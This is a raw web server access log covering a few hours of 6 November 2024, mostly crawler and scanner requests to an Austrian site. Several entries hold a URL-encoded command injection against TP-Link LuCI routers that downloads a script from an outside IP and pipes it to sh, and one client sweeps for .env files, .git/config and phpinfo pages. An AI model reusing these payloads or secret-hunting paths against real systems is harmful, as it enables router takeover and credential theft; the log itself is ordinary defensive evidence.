156.59.198.135 - - [06/Nov/2024:06:24:39 +0100] "GET /renault.activities.at/htdocs/editor/design/image/Office2003/selectall.gif HTTP/1.0" 404 327 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [06/Nov/2024:06:28:41 +0100] "GET /renault.activities.at/htdocs/editor/design/image/Office2003/open.gif HTTP/1.0" 404 323 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [06/Nov/2024:06:39:55 +0100] "GET /renault.2web.at/htdocs/export/txt/factura/FacturaExport20170628092003.txt HTTP/1.0" 404 325 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
92.249.48.215 - - [06/Nov/2024:06:44:39 +0100] "GET / HTTP/1.1" 200 423 "-" "Hello World/1.0"
179.43.191.98 - - [06/Nov/2024:06:45:08 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
156.59.198.136 - - [06/Nov/2024:06:46:53 +0100] "GET /renault.activities.at/htdocs/editor/design/image/Office2003/color.gif HTTP/1.0" 404 324 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [06/Nov/2024:06:50:54 +0100] "GET /renault.activities.at/htdocs/editor/design/image/Office2003/combobox.gif HTTP/1.0" 404 327 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
147.185.132.19 - - [06/Nov/2024:06:51:44 +0100] "GET / HTTP/1.0" 200 423 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
156.59.198.136 - - [06/Nov/2024:06:54:54 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10936725.pdf HTTP/1.0" 404 323 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
95.214.53.91 - - [06/Nov/2024:06:55:33 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
45.148.10.69 - - [06/Nov/2024:06:56:14 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/76.0.3809.87 Chrome/76.0.3809.87 Safari/537.36"
194.165.16.76 - - [06/Nov/2024:07:06:32 +0100] "\x03" 400 383 "-" "-"
172.105.64.178 - - [06/Nov/2024:07:09:31 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 zgrab/0.x"
156.59.198.135 - - [06/Nov/2024:07:14:56 +0100] "GET /renault.2web.at/htdocs/export/txt/factura/FacturaExport20170925150632.txt HTTP/1.0" 404 325 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [06/Nov/2024:07:18:56 +0100] "GET /renault.2web.at/htdocs/export/txt/factura/FacturaExport20170228092302.txt HTTP/1.0" 404 325 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
185.191.126.248 - - [06/Nov/2024:07:40:31 +0100] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103.149.87.69%2Ft+-O-+|+sh%60) HTTP/1.1" 404 371 "-" "Go-http-client/1.1"
31.220.1.88 - - [06/Nov/2024:07:43:16 +0100] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103.149.87.69%2Ft+-O-+|+sh%60) HTTP/1.1" 404 371 "-" "Go-http-client/1.1"
78.153.140.223 - - [06/Nov/2024:07:44:56 +0100] "\x16\x03\x01" 400 383 "-" "-"
78.153.140.223 - - [06/Nov/2024:07:44:56 +0100] "GET /.env HTTP/1.1" 404 349 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.20 Safari/537.36 OPR/15.0.1147.18 (Edition Next)"
78.153.140.223 - - [06/Nov/2024:07:44:56 +0100] "GET /demo/.env HTTP/1.1" 404 354 "-" "Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.8.0.1) Gecko/20060124 Firefox/1.5.0.1"
78.153.140.223 - - [06/Nov/2024:07:44:57 +0100] "GET /dev/.env HTTP/1.1" 404 353 "-" "Mozilla/5.0 (X11; FreeBSD amd64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.65 Safari/535.11"
78.153.140.223 - - [06/Nov/2024:07:44:57 +0100] "GET /doc/.env HTTP/1.1" 404 353 "-" "Mozilla/5.0 (Linux; U; Android 4.2.2; es-mx; Azumi A35S Build/JDQ39) AppleWebKit/534.30 (KHTML, likeGecko) Version/4.0 Mobile Safari/534.30"
78.153.140.223 - - [06/Nov/2024:07:44:57 +0100] "GET /docs/.env HTTP/1.1" 404 354 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.2 Safari/605.1.15"
78.153.140.223 - - [06/Nov/2024:07:44:57 +0100] "GET /download/.env HTTP/1.1" 404 358 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36 OPR/31.0.1889.163"
78.153.140.223 - - [06/Nov/2024:07:44:57 +0100] "GET /env/.env HTTP/1.1" 404 353 "-" "Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.10"
78.153.140.223 - - [06/Nov/2024:07:44:57 +0100] "GET /frontend/web/debug/default/view HTTP/1.1" 404 376 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1) Gecko/20061001 Firefox/2.0b (Swiftfox)"
78.153.140.223 - - [06/Nov/2024:07:44:58 +0100] "GET /html/.env HTTP/1.1" 404 354 "-" "Mozilla/5.0 (Windows NT 6.2; rv:40.0) Gecko/20100101 Firefox/40.0"
78.153.140.223 - - [06/Nov/2024:07:44:58 +0100] "GET /inc/.env HTTP/1.1" 404 353 "-" "Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36 OPR/49.0.2725.64"
78.153.140.223 - - [06/Nov/2024:07:44:58 +0100] "GET /info/ HTTP/1.1" 404 350 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.999 Safari/533.4"
78.153.140.223 - - [06/Nov/2024:07:44:58 +0100] "GET /infophp.php HTTP/1.1" 404 356 "-" "Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10"
78.153.140.223 - - [06/Nov/2024:07:44:58 +0100] "GET /infos.php HTTP/1.1" 404 354 "-" "Mozilla/5.0 (Linux; Android 5.1.1; LGMS330 Build/LMY47V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.98 Mobile Safari/537.36"
78.153.140.223 - - [06/Nov/2024:07:44:58 +0100] "GET /infos/ HTTP/1.1" 404 351 "-" "Mozilla/5.0 (Linux; Android 4.4.2; GT-N7100 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36"
78.153.140.223 - - [06/Nov/2024:07:44:58 +0100] "GET /lib/.env HTTP/1.1" 404 353 "-" "Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.2.15 Version/10.00"
78.153.140.223 - - [06/Nov/2024:07:44:59 +0100] "GET /library/.env HTTP/1.1" 404 357 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)"
78.153.140.223 - - [06/Nov/2024:07:44:59 +0100] "GET /logging/.env HTTP/1.1" 404 357 "-" "Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.9.0.13) Gecko/2009080316 Ubuntu/8.04 (hardy) Firefox/3.0.13"
78.153.140.223 - - [06/Nov/2024:07:44:59 +0100] "GET /media/.env HTTP/1.1" 404 355 "-" "Mozilla/5.0 (X11; U; Linux x86-64; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0"
78.153.140.223 - - [06/Nov/2024:07:44:59 +0100] "GET /misc/.env HTTP/1.1" 404 354 "-" "Mozilla/5.0 (Linux; Android 4.4.2; en-gb; SAMSUNG GT-I9195 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Mobile Safari/537.36"
78.153.140.223 - - [06/Nov/2024:07:44:59 +0100] "GET /new/.env HTTP/1.1" 404 353 "-" "Mozilla/5.0 (Windows NT 5.2; rv:40.0) Gecko/20100101 Firefox/40.0"
78.153.140.223 - - [06/Nov/2024:07:44:59 +0100] "GET /phpinfo.php HTTP/1.1" 200 62965 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36"
78.153.140.223 - - [06/Nov/2024:07:45:00 +0100] "GET /phpinfos/ HTTP/1.1" 404 354 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.461.0 Safari/534.3"
78.153.140.223 - - [06/Nov/2024:07:45:00 +0100] "GET /pinfo.php HTTP/1.1" 404 354 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:43.0) Gecko/20100101 Firefox/43.0"
78.153.140.223 - - [06/Nov/2024:07:45:01 +0100] "GET /production/.env HTTP/1.1" 404 360 "-" "Mozilla/5.0 (Linux; U; Android 4.1.2; da-dk; GT-I9100 Build/JZO54K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
78.153.140.223 - - [06/Nov/2024:07:45:01 +0100] "GET /public/.env HTTP/1.1" 404 356 "-" "Mozilla/5.0 (Linux; Android 7.0; SAMSUNG SM-G930A Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/5.4 Chrome/51.0.2704.106 Mobile Safari/537.36"
78.153.140.223 - - [06/Nov/2024:07:45:01 +0100] "GET /public_html/.env HTTP/1.1" 404 361 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
78.153.140.223 - - [06/Nov/2024:07:45:02 +0100] "GET /server/.env HTTP/1.1" 404 356 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.0.9895 Safari/537.36"
78.153.140.223 - - [06/Nov/2024:07:45:02 +0100] "GET /shared/.env HTTP/1.1" 404 356 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.202.2 Safari/532.0"
78.153.140.223 - - [06/Nov/2024:07:45:02 +0100] "GET /site/.env HTTP/1.1" 404 354 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
78.153.140.223 - - [06/Nov/2024:07:45:02 +0100] "GET /stage/.env HTTP/1.1" 404 355 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1pre) Gecko/2008062222 Firefox/3.0.1pre (Swiftfox)"
78.153.140.223 - - [06/Nov/2024:07:45:02 +0100] "GET /staging/.env HTTP/1.1" 404 357 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0"
78.153.140.223 - - [06/Nov/2024:07:45:02 +0100] "GET /tool/view/phpinfo.view.php HTTP/1.1" 404 371 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1) AppleWebKit/526.3 (KHTML, like Gecko) Chrome/14.0.564.21 Safari/526.3"
78.153.140.223 - - [06/Nov/2024:07:45:03 +0100] "GET /upload/.env HTTP/1.1" 404 356 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; BO1IE8_v1;ENUS)"
78.153.140.223 - - [06/Nov/2024:07:45:03 +0100] "GET /vendor/.env HTTP/1.1" 404 356 "-" "Mozilla/5.0 (iPad; U; CPU OS 5_0 like Mac OS X; en-us) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.0.2 Mobile/9A5248d Safari/6533.18.5"
78.153.140.223 - - [06/Nov/2024:07:45:03 +0100] "GET /web/.env HTTP/1.1" 404 353 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Win64; AMD64)"
78.153.140.223 - - [06/Nov/2024:07:45:03 +0100] "GET /web/debug/default/view HTTP/1.1" 404 367 "-" "Mozilla/5.0 (Android 5.0.2; MotoE2(4G-LTE) Build/LXI22.50-24.1) AppleWebKit/537.36 (KHTML, like Gecko) NTENTBrowser/1.1.0.506 (Kcell-KZ) Mobile Safari/537.36"
156.59.198.136 - - [06/Nov/2024:07:46:16 +0100] "GET /renault.2web.at/htdocs/export/txt/factura/FacturaExport20140508165126.txt HTTP/1.0" 404 324 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
205.210.31.99 - - [06/Nov/2024:07:49:09 +0100] "\x16\x03\x01" 400 383 "-" "-"
205.210.31.99 - - [06/Nov/2024:07:49:10 +0100] "\x16\x03\x01" 400 383 "-" "-"
156.59.198.135 - - [06/Nov/2024:07:50:16 +0100] "GET /renault.activities.at/htdocs/export/xml/data/articles/202106081003_RenArticle.xml HTTP/1.0" 404 331 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [06/Nov/2024:07:54:17 +0100] "GET /renault.activities.at/htdocs/pinEdit/editor/config/xml-toolbar/toolbar-at.xml HTTP/1.0" 404 325 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [06/Nov/2024:07:58:16 +0100] "GET /renault.activities.at/htdocs/pinEdit/editor/config/xml-toolbar/toolbar-style5.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [06/Nov/2024:08:02:16 +0100] "GET /renault.activities.at/htdocs/export/xml/data/articles/201907230903_RenArticle.xml HTTP/1.0" 404 331 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [06/Nov/2024:08:06:16 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10404844.pdf HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [06/Nov/2024:08:10:17 +0100] "GET /renault.activities.at/htdocs/export/xml/data/exportArticles_20230924035604.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
185.191.126.248 - - [06/Nov/2024:08:12:49 +0100] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103.149.87.69%2Ft+-O-+|+sh%60) HTTP/1.1" 404 371 "-" "Go-http-client/1.1"
156.59.198.135 - - [06/Nov/2024:08:14:17 +0100] "GET /renault.activities.at/htdocs/editor/design/image/Office2003/pagebreak.gif HTTP/1.0" 404 326 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
1.231.222.25 - - [06/Nov/2024:08:18:12 +0100] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
156.59.198.135 - - [06/Nov/2024:08:18:23 +0100] "GET /renault.activities.at/htdocs/editor/design/image/Office2003/outdent.gif HTTP/1.0" 404 325 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [06/Nov/2024:08:24:49 +0100] "GET /renault.activities.at/htdocs/editor/design/image/Office2003/backcolor.gif HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
109.194.248.203 - - [06/Nov/2024:08:30:29 +0100] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36"
141.98.11.79 - - [06/Nov/2024:08:33:44 +0100] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F45.202.35.24%2Ftplink+-O-%7C+sh%60) HTTP/1.1" 404 371 "-" "Go-http-client/1.1"
31.220.1.88 - - [06/Nov/2024:08:35:56 +0100] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103.149.87.69%2Ft+-O-+|+sh%60) HTTP/1.1" 404 371 "-" "Go-http-client/1.1"
156.59.198.136 - - [06/Nov/2024:08:38:25 +0100] "GET /renault.activities.at/htdocs/editor/design/image/Office2003/remove.gif HTTP/1.0" 404 325 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
109.194.248.203 - - [06/Nov/2024:08:38:34 +0100] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36"
31.220.40.210 - - [06/Nov/2024:08:39:00 +0100] "GET /.git/config HTTP/1.1" 404 290 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0"
156.59.198.136 - - [06/Nov/2024:08:42:46 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10635497.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
151.235.35.93 - - [06/Nov/2024:08:45:02 +0100] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
151.235.35.93 - - [06/Nov/2024:08:45:02 +0100] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
31.220.40.210 - - [06/Nov/2024:08:45:57 +0100] "GET /.git/config HTTP/1.1" 404 296 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0"
156.59.198.136 - - [06/Nov/2024:08:46:46 +0100] "GET /renault.2web.at/htdocs/export/txt/factura/FacturaExport20180727093050.txt HTTP/1.0" 404 325 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [06/Nov/2024:08:50:47 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11795111.pdf HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [06/Nov/2024:08:54:47 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11671647.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
45.84.89.2 - - [06/Nov/2024:09:01:07 +0100] "GET / HTTP/1.1" 200 423 "-" "Mozilla/6.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Inspici (www.inspici.com)"
185.242.226.10 - - [06/Nov/2024:09:10:22 +0100] "GET /activities.ico HTTP/1.1" 200 1406 "-" "python-requests/2.26.0"
185.242.226.10 - - [06/Nov/2024:09:10:22 +0100] "GET / HTTP/1.1" 200 274 "-" "python-requests/2.26.0"
156.59.198.136 - - [06/Nov/2024:09:14:49 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10344799.pdf HTTP/1.0" 404 323 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
27.36.188.246 - - [06/Nov/2024:09:15:17 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (compatible; MSIE 6.0; Windows CE; Trident/3.0)"
156.59.198.136 - - [06/Nov/2024:09:18:50 +0100] "GET /renault.activities.at/htdocs/editor/design/image/Office2003/link.gif HTTP/1.0" 404 324 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
31.220.1.88 - - [06/Nov/2024:09:27:04 +0100] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103.149.87.69%2Ft+-O-+|+sh%60) HTTP/1.1" 404 371 "-" "Go-http-client/1.1"
178.215.238.67 - - [06/Nov/2024:09:28:56 +0100] "GET /login.rsp HTTP/1.1" 404 354 "-" "Hello World"
59.126.168.111 - - [06/Nov/2024:09:29:50 +0100] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
95.214.55.79 - - [06/Nov/2024:09:46:40 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
109.194.248.203 - - [06/Nov/2024:09:46:50 +0100] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36"
51.83.226.53 - - [06/Nov/2024:09:55:47 +0100] "GET /robots.txt HTTP/1.1" 404 370 "-" "Mozilla/5.0 (compatible; SeekportBot; +https://bot.seekport.com)"
51.83.226.53 - - [06/Nov/2024:09:55:47 +0100] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (compatible; SeekportBot; +https://bot.seekport.com)"
156.59.198.136 - - [06/Nov/2024:09:58:55 +0100] "GET /renault.activities.at/htdocs/export/xml/data/articles/202103161403_RenArticle.xml HTTP/1.0" 404 331 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
185.191.126.248 - - [06/Nov/2024:09:59:12 +0100] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103.149.87.69%2Ft+-O-+|+sh%60) HTTP/1.1" 404 371 "-" "Go-http-client/1.1"
156.59.198.135 - - [06/Nov/2024:10:02:55 +0100] "GET /renault.activities.at/htdocs/export/xml/data/articles/202003231603_RenArticle.xml HTTP/1.0" 404 331 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [06/Nov/2024:10:06:55 +0100] "GET /renault.activities.at/htdocs/export/xml/data/articles/201910170903_RenArticle.xml HTTP/1.0" 404 332 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [06/Nov/2024:10:10:55 +0100] "GET /renault.2web.at/htdocs/export/txt/factura/FacturaExport20140404094657.txt HTTP/1.0" 404 323 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
141.98.11.79 - - [06/Nov/2024:10:12:49 +0100] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F45.202.35.24%2Ftplink+-O-%7C+sh%60) HTTP/1.1" 404 371 "-" "Go-http-client/1.1"
156.59.198.136 - - [06/Nov/2024:10:14:55 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10754191.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [06/Nov/2024:10:19:32 +0100] "GET /renault.activities.at/htdocs/editor/design/image/Office2003/right.gif HTTP/1.0" 404 324 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [06/Nov/2024:10:23:32 +0100] "GET /renault.activities.at/htdocs/editor/design/image/Office2003/table.gif HTTP/1.0" 404 324 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [06/Nov/2024:10:27:32 +0100] "GET /renault.activities.at/htdocs/editor/design/image/Office2003/date.gif HTTP/1.0" 404 323 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [06/Nov/2024:10:31:33 +0100] "GET /renault.activities.at/htdocs/editor/design/image/Office2003/indent.gif HTTP/1.0" 404 324 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [06/Nov/2024:10:35:33 +0100] "GET /renault.activities.at/htdocs/editor/design/image/Office2003/paste.gif HTTP/1.0" 404 324 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [06/Nov/2024:10:39:34 +0100] "GET /renault.activities.at/htdocs/editor/design/image/Office2003/neu.gif HTTP/1.0" 404 323 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
109.194.248.203 - - [06/Nov/2024:10:51:29 +0100] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36"
185.191.126.248 - - [06/Nov/2024:10:52:19 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
